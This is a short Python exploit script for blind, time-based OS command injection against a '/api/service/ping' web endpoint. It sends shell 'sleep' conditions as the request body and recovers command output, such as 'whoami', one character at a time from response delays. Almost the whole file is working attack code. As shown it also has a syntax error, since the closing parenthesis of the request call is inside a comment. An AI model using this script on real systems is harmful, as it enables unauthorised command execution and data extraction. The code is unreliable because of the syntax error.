#!/usr/bin/python3

import requests
import json
import jwt
import time
import sys
from urllib.parse import quote_plus


server="127.0.0.1"
port=5000
DELAY = 6
url=f"http://{server}:{port}"
rce_endpoint=f"{url}/api/service/ping"
token = "<TOKEN>"


def oracle(payload):
    start = time.time()
    headers = {
        # if body == JSON: "Content-Type": "application/json", 
        "Authorization": f"Bearer {token}"}
    body = f"{payload}"
    response = requests.post(
        rce_endpoint,
        headers = headers, 
        data = body
        # if body == JSON: data=json.dumps(body))
    return time.time() - start > DELAY

def dumpNumber(substatement):
    print(f"[*] Guessing Length of {substatement}:")
    length = 0
    while not oracle(f"if [ $({substatement} | wc -c) -le  {length} ]; then sleep {DELAY}; fi;"):
        length += 1
    print(f"[*] Length = {length}")
    return length


def dumpString(substatement, length):
    print(f"[*] Guessing Value of {substatement}:")
    val = ""
    for i in range(1, length+1):
        for c in range(32,127):
            if oracle(f"{substatement} | head -c {i} | tail -c 1 | {{ read c; if [ \"$c\" = \"{chr(c)}\" ]; then sleep {DELAY}; fi; }}"):
                val += chr(c)
                print(val)
    print(f"[*] Name = {val}")
    return val


print(f"\n[*] Validating Oracle...")

# Example Usage
whoami_length = dumpNumber('whoami')
whoami = dumpString('whoami', whoami_length)
